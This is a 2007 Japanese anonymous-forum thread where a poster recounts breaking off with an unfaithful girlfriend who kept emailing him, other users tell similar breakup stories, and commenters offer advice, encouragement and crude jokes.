123 :恋人は名無しさん:2007/01/08(月) 21:40:26 ID:oHGIcpOL0
>>120
セクース後寝ている所に乱入してしまったんじゃなかったか?
よっぽど激しかったんじゃないか?

>>122
本人は温泉行くと言ってたが。

124 :408 ◆efUlhfnBmw :2007/01/08(月) 23:45:12 ID:2vpoPQw60
湯ったりしてきましたよ。
雪のせいで結局1泊してしまった。(日帰りのつもりが)
2日で特に何もありません。Eのメールは相変わらずきます。着拒したら自宅にかけられそうだし。
明日からはがんばろ。

125 :恋人は名無しさん:2007/01/08(月) 23:51:19 ID:J1qqWN6b0
>>124
きっと今年は、イイコトある。
良いことと悪いことは交互にくるもんだ。

老婆心ながら、Lとは縁切りしたほうがいいかもな。

126 :恋人は名無しさん:2007/01/09(火) 14:54:37 ID:BqpJ3MBI0
というかEはせっかく手に入れかけたお人良しなお財布を手放したくないのがミエミエじゃん。
408さんも自分が悪いわけじゃないけど、かっこ悪い話だから周りに言いづらいのはわかるけど
ちゃんと親や親しい友人だけにでも説明してEやLと縁切るってのをやっとかないと、
Eが別の財布を見つけるまでEは408さんをキープしてるつもりになってるぞ。

127 :恋人は名無しさん:2007/01/09(火) 18:20:49 ID:7dvLk/Do0
んだな。
あれだけのことをやっておきながらまだメール送り続けてくるEの面の皮の厚さにはびっくりする。
相当なタマだろうから、向こうのペースに巻き込まれないように腹括って縁切りしないと後々面倒なことになりそう。

128 :恋人は名無しさん:2007/01/09(火) 20:16:32 ID:31iXB6y40
Eとしては408に顔を見せるなと言われただけだから、
メールや電話はしても良いと思ってるんじゃないか。

それに謝れば408は許してくれるって思ってると思うな。


129 :408 ◆efUlhfnBmw :2007/01/10(水) 00:15:16 ID:zKeRjHU20
こんばんわ。お人良しなお財布ですorzチョットヒドイ
特に何も無く過ぎております。嵐の前の何とかでないのを祈りつつ。
Eからのメールを見直してみると、どうも彼女はLへの愛人宣言を自分が怒っていると思われる節が・・・
浮気してるのが一番の問題なんだけど・・・どうも的外れっぽい気が。
きちんと絶縁宣言した方がよさそうです。

皆さんL親DQNと言ってますけど、どっちかというと凄まじくプライドが高い(特にL母)です。
L母には確実に恨みかってるような気がします。
一応友人関係には今回の件は説明しておきました。(E関係の友達にも)
Lには直接動いた方がいいですかね?どっちにしろきちんとしておきたいので。


130 :恋人は名無しさん:2007/01/10(水) 00:25:12 ID:1KwK1w2g0
>>129
乙。
周り固めたのなら、Lサイドが何か動きを見せない限り
放置でもいいと思う。

会うんだったら、信頼できる人の立会いが必要かと。

131 :恋人は名無しさん:2007/01/10(水) 00:31:57 ID:ULaGbzG40
>>122みたいに定期的に報告しないとネタ認定、みたいなのはどうにかならんのか?
408も義務じゃないんだから疲れない程度にな。

132 :恋人は名無しさん:2007/01/10(水) 00:35:07 ID:yPKFDPnl0
>>129
Lとはモチロン絶縁だろうが
このままだと408もモヤモヤするだろうから
対決してきたら?どんなDQN発言が飛び出すかわからんからレコーダー持っていきな

あとRは慰謝料請求はしないのか
LやEに。

133 :恋人は名無しさん:2007/01/10(水) 00:37:32 ID:yPKFDPnl0
>>129
あとEの行動でむかつくのは愛人宣言もそうだが
おまえに残飯食わせようとしたのが一番ムカツクわ
おまえんちまで持ってきてるし、その残飯

絶縁宣言するなら、そのときに怒っておいてくれ

134 :恋人は名無しさん:2007/01/10(水) 00:39:32 ID:HTadFJ9Y0
>>129
どうせ絶縁するんだからとりあえずEからのメールうp

135 :恋人は名無しさん:2007/01/10(水) 03:01:29 ID:m3+SKjyi0
Eと絶縁宣言する前に犬か猫の食べ残しをEに奢ってあげようよ。

136 :恋人は名無しさん:2007/01/10(水) 09:15:20 ID:ICt1hhqj0
>>129
俺は>>132の意見に賛成。

137 :恋人は名無しさん:2007/01/10(水) 19:21:40 ID:9PhOy8Tp0
>>135
それ良いね。
Eを「食事でもしながら話し合いしよう」と呼び出し、犬猫用の(ry

138 :恋人は名無しさん:2007/01/12(金) 01:25:54 ID:+BkIcu6T0



糞 喰わせ

139 :オナニスト ◆MRmxpjiK.2 :2007/01/12(金) 02:13:43 ID:flI5V7pQ0
408
幸せになれよ!
おまえ弱くない強い精神が!

140 :恋人は名無しさん:2007/01/12(金) 12:50:32 ID:evrl53rL0
408は無理してLに会う必要はないんじゃないか。
相手はかなりのDQNっぽいし、逆恨みで何かされんとも限らん。
最後っ屁にお前を傷つけるような一言を言うかもしれん。

向こうが神妙な感じで、会って謝りたいとか言っても注意して、
誰かと一緒に会った方がいいと思うぞ。





141 :恋人は名無しさん:2007/01/12(金) 22:30:29 ID:EfyZiwot0
>>140
木刀持って5人くらいで、謝りに来そうだな。


142 :ヤジセルリアン:2007/01/14(日) 18:56:59 ID:r8VLkFeu0

「オイ、この間はわるかったな!! ああん?」ってな

143 :408 ◆efUlhfnBmw :2007/01/17(水) 00:08:25 ID:xKI4AFSQ0
こんばんわ。

L側からのアプローチはまったくありません。このまま何も無ければいいんだけど。
それよかEのメールがどんどん酷くなって日記メールになってきてます。
朝:「ごはんしてるよ〜(目玉焼きとトーストの写真)」
昼:「今日はおせんたくしてます。(干してあるぱんつの写真)」
夜:「これからおふろだよ〜(素足の写真)」
おまえの日記なぞ見たくない!やめれ!とメールしたら
「Sにもう疑われたくないのでメールしてるのに。゚(゚´Д`゚)゚。」orzソウイウモンダイジャナイ
で、直後に「もうねるね〜Sの事を思いながら(ベッドの写真)」

そのベッドでおまえとLがすっぽんぽんで寝てるの見たんだけど・・・自分馬鹿にされているのか?
仕事しているときが一番心休まるってどうかしてる。

144 :恋人は名無しさん:2007/01/17(水) 00:12:01 ID:OgcQxZ3R0
>>143
> おまえの日記なぞ見たくない!やめれ!とメールしたら

メールするなよ。アドレスも変えなきゃダメでしょ・・・
そんなんじゃ、そのうちに既成事実みたいなの作られてやりこめられちゃうよ

145 :恋人は名無しさん:2007/01/17(水) 00:19:26 ID:s1jxQBbT0
>>143
うわぁ、、、。
近況気になってたけどそう来てるのか・・
親御さんに真実報告とかはしたの?

146 :恋人は名無しさん:2007/01/17(水) 00:20:57 ID:bYklW76H0
>>408
そんなにいやだったら、さっさとアドレス変えればいいだろ?このヘタレが!

147 :恋人は名無しさん:2007/01/17(水) 00:26:53 ID:1ymiiDH60
>143
本当に着信拒否にしたほうがいいんじゃないの?
もしくは、E親交えて一度きちんと話し合うとか・・・。
二十歳超えた大人同士の恋愛に親巻き込むとかどうって思うけど
親にも事情をきちんと説明しとかないと、
親には自分の都合の良いようにしか言わないだろうし(例えば「もう408も許してくれたし、今は普通にラブラブだよ」とか平気で嘘付きそう)
反省の色全く見られないまま、
「自分は謝ったんだから悪くないのに、一方的に別れるって言う408のほうが悪いのよ」
って感じで逆恨みで色々されるかもしれないよ。

こんな女に付きまとわれて本当にかわいそうだ・・・。
408氏に一刻も早く平安が訪れますように・・・。

148 :恋人は名無しさん:2007/01/17(水) 00:28:14 ID:SVBgjxID0
本人が甘いんじゃな

149 :恋人は名無しさん:2007/01/17(水) 00:32:44 ID:5HjTRcrj0
>>143
408に許してもらえると思っているんだろうな、Sは…
408のご両親には、全て話しておくほうがいいんじゃないか?
Sは何するか判らない、と考えておくべきでは。

150 :恋人は名無しさん:2007/01/17(水) 00:33:10 ID:5/Y4JQ4QO
どうもEに流されかけてるぞ
ここはすっぱりアドレス変える
んで番号も着信拒否にする

こうでもしないと408は甘いからいずれEの思う壷にはまりそうな予感

151 :恋人は名無しさん:2007/01/17(水) 00:35:36 ID:k4mI7DaX0
>>143
Eに取ってはLと終わった時点でケジメ取ったつもりなんだろうな

http://love4.2ch.net/test/read.cgi/furin/1165372579/3
でもあるがこのまま行くと
「頑張ってる私を認めてくれない、あなたが悪い」
って理由でまたなんかしそうだなw

152 :恋人は名無しさん:2007/01/17(水) 00:38:21 ID:s1jxQBbT0
408がそのうち
「結局、不信感やあの記憶は消えないし
今は嫌々ですが、結婚まで考えた相手だし
やり直す努力だけはしてみようと思います。駄目かもしれないけどw」
とかレス出してきそうで、それだけが本当に怖い

153 :恋人は名無しさん:2007/01/17(水) 00:46:09 ID:J/8VHSCLO
まぁ408が復縁しようがなにしようが知ったこっちゃない。
こいつは弱さを優しさとはき違えてる。なるようにしかならん

154 :恋人は名無しさん:2007/01/17(水) 00:50:02 ID:s1jxQBbT0
M子降臨マダー?

155 :恋人は名無しさん:2007/01/17(水) 00:50:22 ID:pQLs1rwU0
結局行動するのは自分だしな。
着拒・メルアド変更するのも自分の自由だ。408がこのままで良いんなら別に良いんじゃね。

156 :408 ◆efUlhfnBmw :2007/01/17(水) 00:54:54 ID:xKI4AFSQ0
そうですよね。甘いですよね。

今、携帯メアド変えた。E番着拒した。仲間内には朝メアド変えた件メールする。
Eには今日の帰りに行って話してくる。

もう良い子でいるのやめ。例えきっかけが「押すなよ!絶対に押すなよ!」皆に押されてやったとしても
けじめつける。Lのところにも怒鳴り込んでやるわ。



157 :恋人は名無しさん:2007/01/17(水) 00:55:12 ID:VID83IQO0
本気で嫌ならはっきりうざいってことを告げて無視し続ける(着信拒否とかメルアド変えるとか)
それで家や仕事場にまで押しかけてくるなら、多少みっともなくてもEの親に連絡とってやめさせるように話つけるか
他の友人に頼んで説得してもらうとか色々あるだろに。
ひょっとして408はいまだに自分のメンツを気にしてるのか?

158 :恋人は名無しさん:2007/01/17(水) 00:57:23 ID:I8jc8/4a0
>>156
>Eには今日の帰りに行って話してくる。

接触するな、もう。

159 :恋人は名無しさん:2007/01/17(水) 00:57:49 ID:VID83IQO0
リロードしてなかったorz
>>156
乙。Eは脳内電波垂れ流しで被害者のように泣きじゃくるかも知れんけど、
負けないように頑張ってください。

160 :恋人は名無しさん:2007/01/17(水) 00:58:40 ID:mhqddosH0
>156
着拒否GJ。

二人きりで話すのも多少危険そうだが・・・。
もしもの時は誰か事情を知ってる第三者つけたほうがイイカモ

161 :恋人は名無しさん:2007/01/17(水) 01:01:13 ID:OgcQxZ3R0
>>156
Eのとこに行かなくてもいいと思う。
どうしても行くなら2人きりじゃなく第三者も連れてって「証人」としなよね。
周りには「新しいアドをEに聞かれても教えないように」と根回ししとくことも忘れずに。

162 :本スレ719:2007/01/17(水) 01:20:52 ID:rTKZ7asj0
空気読まずに一応終了報告……になってくれりゃいいんだが('A`)

夕方にきっぱりとメール送って絶縁宣言。
その後残業でふらふら。
結局一時間くらいしか眠ってなかったしな……。
後やっぱり精神的にキツかったんだろう。

正直に言ってくれた友人に大感謝。
本スレに書き込んで怒られたり励まされたり慰められたり罵倒されたりで
何だかんだで背中押される気分だった。
色々考えた結果、メール送ったんだが、やっぱまだ少し未練があったんだろうな。
精神的にキツいのか何なのか、面白いほど仕事が進まねぇ。
それでも一応仕事終わらせて帰る途中、日付変わるあたりで
来るとは思ってなかった返信が。

……あまりの内容の気持ち悪さに、本気で吐きそうになった。完璧に未練が消えた。
…………そして脊髄反射でレスしちまった……orz
メンヘラと関わるもんじゃない……今まで偏見持たないようにしてたが、意見を翻すよ。
まぁそういう俺もヤバイみたいだけどな。
今度、土曜とかにもやってる心療内科行ってくるよ……
何か先月からあちこちおかしくなってるのは、ちょっと自覚してたしな。

163 :恋人は名無しさん:2007/01/17(水) 01:24:36 ID:mhqddosH0
>162
乙。苦しかったな。

終わったのなら、時間はかかるかもしれないが自分の療治のために今週末はゆっくりとすごしてくれ。
それと719だけど、791さんでいいんだよね?

164 :恋人は名無しさん:2007/01/17(水) 01:27:57 ID:RoSrHZ8a0
野次馬で悪いが、返信内容は知りたい

165 :恋人は名無しさん:2007/01/17(水) 01:30:31 ID:I8jc8/4a0
>>162
乙。今度はまっとうな恋愛ができるよう祈る。

166 :本スレ719=791:2007/01/17(水) 01:41:49 ID:rTKZ7asj0
今も正直苦しい。
でも、綺麗さっぱり冷められたから何とかなりそうだ。
しばらくは寂しくなるかもわからんが、
なぁに俺にはディスプレイの中に無数の恋人がいるさ( ゚∀゚)アーッヒャヒャヒャー

>>163
名前間違えてた。すまん。791、つーかY助だ。
早速今週末、別れた俺を肴に酒呑もうという大学時代の野郎共と会うぜ('A`)

>>164
んーと、要約するとだな。

・Y助とは結婚するつもりではいられないこと。 ←(゚Д゚)ハァ?
・M太を好きなのはやめられないということ。 ←(((( ;゚Д゚)))ガクガクブルブル
・「好き」は恋愛だけじゃない。今でもY助のことは好き
・会うことも話すこともできる。でも  結 婚 の 約 束 は で き な い
・自分に落ち度はいっぱいあったし自分のことばかり考えてY助の気持ちを大事にしなかった
 それは反省しているし、もう二度としない
・メールの返信は遅れるけど必ずする

俺の解釈が間違っていないか採点してくれ。

……なんで結婚の話まで出てくるんだ……?
結局、「ごめんなさい」の一言が出ないんだ……。
つーか、 M 太 逃 げ て ー w
友達でいましょうって遠まわしに言ってる? 激しく嫌なんだが。

ちなみに、俺は脊髄反射で、要約すると「お前気持ち悪いよ」と返しました。

>>165
サンキュー。女見つけるの一苦労だがなw
とりあえず、もういい歳だし、玄人童貞を卒業しに行こうかな。

167 :恋人は名無しさん:2007/01/17(水) 01:45:09 ID:IMaAGLoj0
>>166
心の病気を治してからの方が良いよ。
メンヘラなときはメンヘラな人をブラックホールのように吸い寄せて、
不幸スパイラルに。

168 :恋人は名無しさん:2007/01/17(水) 01:48:02 ID:RoSrHZ8a0
>>166
お前に絶対的に好かれてると信じてるみたいだね。
そして浮気した自分をすがってきてくれてるって。

返信GJ

169 :本スレ791:2007/01/17(水) 02:30:26 ID:rTKZ7asj0
>>167
うん、そうするよ。
自分が不幸になるのもされるのも嫌だが、相手も不幸にしたくないしな。
唯一の懸念は男の友人をメンヘラスパイラルに巻き込んでしまわないかだが……。
まぁとりあえず病院行って、結果聞いてからだな。案外何ともないかもしれんし。

>>168
何かね、A子のいう「好き」って、あらゆる意味で軽く聞こえるんだよね。
だからそんな風に信じられるのかなーとかちょっと哀れに思う。
とにかく自分に対して、聞いてるこっちが鬱になるほどコンプレックス持ってる子だから、
半ば妄想交じりでも「モテてる」と思ってたここ最近が忘れられないのかもね。

さて、明日からはもっとすっきりした気分で仕事に行けるように頑張ろう。

170 :恋人は名無しさん:2007/01/17(水) 06:52:48 ID:3SqoVZqe0
後はもう着信拒否だね。
下手に関わり過ぎると自殺未遂とかされかねんし。

171 :恋人は名無しさん:2007/01/17(水) 13:48:35 ID:4vv5RQ4AO
408さんお疲れ…orz
E、ひっぱたきたいくらい日本語通じてないね…
もうとっくに別れてるってこと、ちゃんとわかってるのかな?
会うんじゃなくて、E家族にも見てもらえるように
ハガキで絶縁状でも送ってみたら?

172 :恋人は名無しさん:2007/01/17(水) 14:13:13 ID:DATop9xh0
408、悪いけどいらいらしてくる。
あんたがそんな態度だから、Eはつけこんだし、今もつけこんでるんじゃん。
>メール、やめれ
って本当にそう送ったの?全然やめてくれに思えないよ。
ツンデレが喜んでるみたいだ
あと、Lみたいのに係わっても馬鹿見るだけだから、もう縁切った方がいいと思うんだけど

でも、早く良い彼女見つけて幸せになって欲しいな。

173 :恋人は名無しさん:2007/01/17(水) 14:57:23 ID:S49YzQqW0
==============自分用しおり==================

M子が上手くやれば周囲は男切れのしない女だと思うだろう
しかしM子の手段がイマイチなのでただのメンヘラか馬鹿にしか見えない
特定の相手だけ嫌だ嫌だ言ってるのは流行のツンデレだと思え
そうしたらM子の行為をO子が見破った理由がわかる

O子は彼に警告しているに関わらず一言で終り、結局クリスマスに押しかけられ
疑問が確信に変わった
思わせぶりな態度をぼーっと見てたのは否定もせずにいるのと同様に見られる
事実と思いO子は帰ろうとした彼氏がようやく止め始めてもO子はなかなか信用できない

こりゃ彼氏捨てられるな

=============自分用しおり終了=================

174 :恋人は名無しさん:2007/01/17(水) 15:54:02 ID:SiVgXouZ0
0子が嫉妬心むき出し、パニックをすぐ起こす弱い子と書く人は、
なんというか、「俺だったらこうするね」と後書きしたいだけの人に見える。

報告者の事を好きだと思わせる記述は確かに少ないが、
だからこそ異常さがあるんじゃないかな。


175 :恋人は名無しさん:2007/01/17(水) 16:11:47 ID:3SqoVZqe0
てかあんな文章でよくO子のことだけやたら詳しく分析できるよね。
嫉妬心とかパニックとかさ。まるでその場にいたみたいに。

そのくせM子に関してはまるで文盲みたいなこと言ってさ。
これはどういうことでしょうね。

176 :便乗投下:2007/01/17(水) 20:08:08 ID:PuGqhg3s0
今さっき見たら本スレかなり消費したみたいで責任感じる。
Y助氏がいたから俺も真似して投下。
俺の書き方が悪くて混乱を招いたみたいだが、意識的にそぎ落として書いた。
というのも年末に腹立ちまぎれに一度投下しようと書いてみたら
M子のことクソミソに書いてる俺がいて「ダメだこりゃ」と思った経緯があったから。
M子の異常さをうまく表現できる才能が俺になくてもどかしい。

177 :便乗投下:2007/01/17(水) 20:14:23 ID:PuGqhg3s0
173の言うとおりだと思う。最初にO子ともめた原因は俺にあったと今は思ってる。
実際はO子も最初からエキサイトしてたわけじゃなかった。
なのに俺が「わけわかんねーよ」な反応をしたことで火がついた感じ。
「私は嫌だったな」という話を俺が理解しなかったばかりにエスカレートしてああなった。
O子は負けず嫌いな所はあるけど面倒見がよくて友達も多い。
意外な一面を見たけど逆に今回のことで絶対大事にしようと思ったよ。
俺に初めてできた彼女でもあるんで捨てられないよう注意する。

でも俺、M子の基地外発言をぼーっと見てたわけじゃない。
「何言ってんの?」「それどういう意味?」って聞くそばから
「△さんはいつもとぼけてごまかすね」「嘘が上手なのね」とか巧みに陥れられた。
まさに日本語が通じてない感じで勝手なこと沢山言われた。

178 :恋人は名無しさん:2007/01/17(水) 20:16:42 ID:JusrO+Gq0
Y助さんへ 気になったんだけど紹介してくれた友達と元彼って同一人物なの?

179 :便乗投下:2007/01/17(水) 20:23:50 ID:PuGqhg3s0
M子が俺を好きだと思わせるそぶりは本当に皆無だった。
好きどころか、誰かと仲良くするそぶりを一切見せない人間だから
M子と恋愛話はどうにも結びつかない性質のものだった。ゼミの誰に聞いてもね。
だからクリスマスの晩のM子はまさに異常としか思えなかった。
というかその次に会った時、何もなかった顔でいつも通りに振る舞ってるのを見た時が
一番M子は性格異常者なんだと実感した時かも。

180 :便乗投下:2007/01/17(水) 20:26:43 ID:PuGqhg3s0
くなるけど一例をあげさせてもらう。
M子はゼミ内でトラブったことはないけど「私はあなた達とは違う」な感じの壁をつくるんで
あまり同学年の人間と打ち解けてない。なもんで普段口をきくのは院生や先生くらいなんだが
クリスマスに先生にからんだ時、「先生いつも私に特別なお話してくれる。それが嬉しい」とか突然言うわけ。
突き詰めると「M子が院生について歩くから他のゼミ生にはしない話を院生にまじって聞いてる」ってだけの話。
「お前が勝手に院生にまじってるだけだろ」と突っ込むと「私っていつも一人だから」と。
で、多分これつながりでM子はO子の前でも俺に向かっていきなり
「さっきも話したけど、そばに居させて。私にはそれしかないから」と、言いやがる。
なんか巧みにどうとでもとれる言い方で、逃げ道を用意した思わせぶり発言をやる。

あまり知らない人間に急に馴れ馴れしくされるだけでも返答に困るのに
いきなりこれだよ?何したいのかさっぱりわからない。マジ、混乱した。
書いてたらまた気持ち悪くなってきた。

181 :便乗投下:2007/01/17(水) 20:28:58 ID:PuGqhg3s0
ああ、すんません。分断した。
興奮してつい長くなった。ちょっと落ち着くようにする。

182 :恋人は名無しさん:2007/01/17(水) 21:09:21 ID:SiVgXouZ0
>>179
大変だったな。
O子には社会性がないのはよくわかったよ

183 :恋人は名無しさん:2007/01/17(水) 21:13:38 ID:1dwhWhvmO
>156さんって今日話し合いに行ってるの?

184 :恋人は名無しさん:2007/01/17(水) 21:14:28 ID:EmlpglAs0
>>182

M子じゃなくてか?

185 :恋人は名無しさん:2007/01/17(水) 21:15:45 ID:SiVgXouZ0
>>184
間違えたorz
M子です

186 :ヤジセルリアン:2007/01/17(水) 21:54:22 ID:qZ5dGzoZ0

いまコンビニ行ったらたむろってる若い奴らが険悪で今にも修羅場って感じだった

店長迷惑そう

187 :恋人は名無しさん:2007/01/17(水) 21:58:49 ID:mSZAZFqP0
>>180
179はMが自分と教授の両方に好意をもって
クリスマスに両方を口説いていたと思っているの?

Mは179が好きと言うよりも口説き上戸なだけじゃない?


188 :本スレ791:2007/01/17(水) 23:00:42 ID:DUKtuFbF0
聞かれたから答えるよ。

>>178
正確にはリアルで会って「紹介してもらった」わけじゃないんだ。
俺のサイトを聞いて、それから知り合ったんだよな。
ただ、友人=A子元カレではある。
……実は、最後に会った日に初めて明かされたんだが、
A子は別れる時に、「Y助に会うなら俺と別れろ」と友人に言われてた
らしいんだよな……まぁ俺とは関係なしにケンカしてたらしいが、
俺ダシに使われたかな(´・ω・`)
まぁ結局、俺も因果応報なんだよな。
実際初めて会ったのは別れた後だったけど、そんなに間を置かずだったから。


189 :恋人は名無しさん:2007/01/18(木) 00:44:13 ID:9mE2kCFi0
メンヘラ相手はしんどいんだなあ・・・。

190 :恋人は名無しさん:2007/01/18(木) 01:05:10 ID:wq1WJMKa0
メンヘラ祭り

191 :恋人は名無しさん:2007/01/18(木) 08:20:00 ID:bEtav6ep0
>>179
他の人間とっては便乗とM子はただのゼミ仲間であって、恋愛の対象ではなかったから
何も感じなかったけど、O子にとって便乗はその対象だから鋭く感じ取ったって事だ。
あと、今後の為に言っておくと、彼女や嫁さんが真面目に心配して言ってることは、
どんなに下らない事でも真面目に聞いておいた方がいいよ。
それと、「ばれて困ることは最初に全部喋っておく」のも大事。クリスマスの件も先生と
一緒に介抱した事から他の女子を呼んだ所まできちんと喋っておけば、変に修羅場に
なる事も無かったかもね。

192 :恋人は名無しさん:2007/01/18(木) 09:19:27 ID:/MR/tdIl0
便乗もO子の影響を受けて
M子の言葉に神経質になっているのかな。

「先生いつも私に特別なお話してくれる。それが嬉しい」
酒の席ならそれくらいは許容範囲じゃんって思ったのは私だけ?
目くじら立てることかな?

院生にとっては何でも無い話でも、
学生にとっては新鮮なんだと思うよ。



193 :便乗投下:2007/01/18(木) 10:28:25 ID:/tM3YmDY0
俺もいい加減くどいなと自嘲しつつ、昼前に野暮用で出かけるのでそれまでの間投下。
>>192
言う時の雰囲気ってのがあるだろ。冗談っぽくだったり、真剣な話だったり
言い方一つで受け手の印象ってかわるじゃん?
うまく言えないけどM子は誤解されるようなやらしい言い方してた。

酔って何度も繰り返すんだけど「学生にとってうれしい」ってニュアンスになったり
「私だけ特別扱いしてくれるからスキ(はぁと」みたいな話になったりしてて先生も慌ててた。
逃げ道用意して話すってのはそういうこと。O子の前でもそんな感じで誤解される発言連発。
それともひょっとしてそれって酔ってたら許容範囲なものなの?自信なくす

194 :恋人は名無しさん:2007/01/18(木) 10:30:52 ID:XjGeC1wRO
>>192
ニュアンスの問題かもだけど俺は話の流れ的に
M子の発言はちょっと気持ち悪かったな…
話の流れ関係なくても、大人数の場で
"自分は特別"オーラ出されるとちょっと引くかも。


195 :恋人は名無しさん:2007/01/18(木) 10:38:18 ID:xW1t51di0
>>192
いや、ドン引きだわ。
お前にとっては普通なんだな。

196 :便乗投下:2007/01/18(木) 11:04:40 ID:/tM3YmDY0
>>187
口説かれてたとは全然思ってない。ただひたすら意味不明。好かれてると考えたくない。
そもそも初回の飲み会とクリスマス以外接触も少なくて家まで来られても晴天の霹靂。
ただ「口説き上戸」という考えは頭になかったので(だって全然口説きになってないよ…)
これからはM子のことはそう思うことにする。

197 :恋人は名無しさん:2007/01/18(木) 11:05:06 ID:Ob5jmxnnO
女の子視点から見ても192はないわ。ありえない。

198 :408 ◆efUlhfnBmw :2007/01/18(木) 22:34:11 ID:PPwqUINy0
昨日Eとけりつけてきた。皆さんのご意見に従って付き添いつけてきました。
最後はちょっとキレましたけど(自分が)「一切付き合い無くして」って言ってきました。
何が「好きでいさせて」だ。ふざけるな!結局最後まで謝りなし!
Lの件は付き添いの人にも「もうほっとき」って言われたのでもう無視します。

こんな女好きだったと思うと自分馬鹿だorz

199 :恋人は名無しさん:2007/01/18(木) 22:39:12 ID:XjGeC1wRO
>>198乙でした
きちんと蹴り付けられてよかったな。

最後の一文だけど、がっくりする気も解るが
恋愛においての一つの経験になって良かった
って前向きに捉えておくのが良いと思うよ。
今回の事はきっとこれから先に生かされていくと思うから頑張れ。


200 :恋人は名無しさん:2007/01/18(木) 22:46:16 ID:cvhSn+p+0
>>198
乙です。きちんと関係が終わったようでよかったです。

201 :恋人は名無しさん:2007/01/18(木) 23:05:49 ID:9mE2kCFi0
>>198
乙。プロポーズ寸前に真実が分かったのは天の配剤だと思うよ。
これからの幸せを願う。あとRにも幸せが来るといいな。

202 :恋人は名無しさん:2007/01/18(木) 23:09:01 ID:lnz76UgG0
>>198

詳しく報告いけるかい?

あとRから慰謝料請求とかはないの?
EやLへ

203 :408 ◆efUlhfnBmw :2007/01/18(木) 23:24:11 ID:PPwqUINy0
>202
明日にでも纏めてみます。でも、話っていっても
Eの所行く前に付き添いの人と話>E宅で別れ話&Lとこうなった訳>自分キレたぐらいですけど。

Rの件ですが、泣き別れてからは連絡取って無いのでまったく不明です。
昨日Eには会いましたけどRがらみの話してませんというかできる状態じゃなかったです。

204 :恋人は名無しさん:2007/01/18(木) 23:30:21 ID:lnz76UgG0
>>203
Eと絶縁したって話を手土産に
Rに連絡したらどうだろう?そのときにRの近況聞くとか

205 :恋人は名無しさん:2007/01/18(木) 23:45:25 ID:Rx6lTHlm0
>>198
乙でした。好きだった人の豹変ぶりは、心にざっくりきますよね。
一人で立ち直るより、二人のほうが気持が楽です。
Rと連絡とるのはお二人にとっていい事だと思いますよ。

206 :恋人は名無しさん:2007/01/18(木) 23:53:34 ID:j+GvKcPf0
確かにRと連絡とることで何か埋め合えるんだとしたら
それはいいことかもしれんね。
>>198乙。正直、ちょっと見直した。

207 :恋人は名無しさん:2007/01/19(金) 00:08:19 ID:uFgmTktQ0
なんか、408とRをひっつけたがっている人間が多そうだなw

208 :恋人は名無しさん:2007/01/19(金) 02:25:36 ID:fwiKMzadO
>>198
乙かれさまでした。
今は辛いだろうが、こんな女を嫁にしないで済んだんだから、これで良かったんだよ。
あんな酷い事したくせにさ
「好きでいさせて」なんて頭おかしいよな。
198の気持ちなんて、全く考えてないじゃん!!
198には幸せになって欲しい。

携帯からスマソ…

209 :恋人は名無しさん:2007/01/19(金) 07:43:36 ID:ZaNf6QIzO
>207
Rの近況を聞き出させたいだけじゃない?
ズバッとRがどうなってるか聞け!なんてなかなか言えないさ
それに連絡したからって、くっつくわけじゃないし

210 :恋人は名無しさん:2007/01/19(金) 18:40:52 ID:6+83J/vSO
Rさんいい人そうなのでの心境も気になるし心配だし、
バカ二人に対する慰謝料の話もしてほしいとは思うけど、
ここでRさんに連絡して、その事が友達とかからバカ達の耳に入ったら
「実際あいつらも浮気してたのに俺(私)だけ悪者にされた!最低!!」
……と、なりそうな未来が見える。あたしエスパーかな。

211 :恋人は名無しさん:2007/01/20(土) 00:10:09 ID:eYohOkuY0
>>210
俺はそこまで考えてなかったよ…
一人じゃ辛いかなって。

思考回路がぶっとんでそうなバカ二名なら有り得るな。


212 :408 ◆efUlhfnBmw :2007/01/20(土) 11:12:25 ID:F/iYMmq80
ごめんなさい。報告する言っておいて、仕事徹夜で帰ったの今朝だったので。
午後から、食事をおよばれに行くので(Eとの話し合いに付き合ってくれた人)E突撃報告今夜します。

あとRに連絡いれてみました。L完全自滅。自分に何もこない原因判明。
こんなんならさっさと連絡取った方がよかった。スレの皆さんには何度も背中押していただいて感謝。

213 :恋人は名無しさん:2007/01/20(土) 11:31:44 ID:fjwl5OU10
>L完全自滅。自分に何もこない原因判明。
kwsk!! wktk


214 :恋人は名無しさん:2007/01/20(土) 15:40:23 ID:MztuaMCV0
>>212
乙。待ってます

215 :ヤジセルリアン:2007/01/20(土) 16:03:22 ID:PJKotd4h0

詳しく話しな

216 :恋人は名無しさん:2007/01/20(土) 18:52:41 ID:7O4J3LrMO
待ってるよ!!

217 :408 ◆efUlhfnBmw :2007/01/20(土) 22:08:19 ID:Mx4ki2S00
ただいまです。女の人の「デザートは別腹」ってやつはマジだったのね。
久しぶりに腹いっぱい食べたって気が。気が楽になったせいかリバースしないし。(ご飯中の人ごめん。)

E宅突撃のお話から。
ここのスレの人に背中押されて夜にメルアド変えてE着信拒否した。で朝から。

朝になって通勤途中でメアド変更した件をメールしつつ、今夜Eとの話し合いに
立ち会ってくれる人を・・・と考えて、T先輩(自分やE、Lとかの先輩)に電話する。
T先輩に事情説明するが、今日の予定が空いてないのと俺は修羅場向きでないとの事で
T先輩の彼女のK先輩に聞いたら?と。K先輩に電話する。
K先輩は快く立ち会ってくれる事になったが、一度自分から詳細を聞きたいとの事で
E宅に行く前にK先輩と会う事になる。そしてEにも今晩アパートに行くと連絡。
仕事が終わり、地元に戻りK先輩と合流。喫茶店で話す事に。
その場からEへ電話して1時間後に行くと連絡。

218 :恋人は名無しさん:2007/01/20(土) 22:11:33 ID:7O4J3LrMO
wktk支援

219 :408 ◆efUlhfnBmw :2007/01/20(土) 22:12:05 ID:Mx4ki2S00
まず、K先輩に今回の経過を説明。そして、Eとは絶縁したいと説明する。
話を聞いたK先輩の第一声
K先輩「Eの言いたい事分からないでもないね。」
えっ?話す相手間違えた?明らかに焦っている自分を見たK先輩笑いながら
K先輩「違うよ。EがLの事を守ってあげたくなるって言った事。」
自分「そうなんですか?」
K先輩「Lってさ、何ていうかいつも虚勢張ってる風に見えるんだよね。」
自分「はぁ・・・」
K先輩「それが、こう母性本能くすぐるんだよね。」
自分「母性本能ですか。」
K先輩「Sはどっちかって言うといつも一人で解決しようとしてるじゃない。
    人に弱みを見せないし、可愛げ無いっていうか。」
可愛げないですか自分。
K先輩「女の子としては、自分だけには弱いところ見せて欲しいってとこもあるの。」
自分「こればっかりは性分ですんで。」
K先輩「だから浮気しても良いって事じゃないからね。でも、今回こうやって
    Sに相談されたのだって弱いとこみせてるじゃないw」
自分苦笑いするしかないです。
K先輩「そんなSが弱音吐くくらいまいっているって事だけど、私は聞き役に回る
    だけだからね。結局はSとE二人の問題なんだからね。」
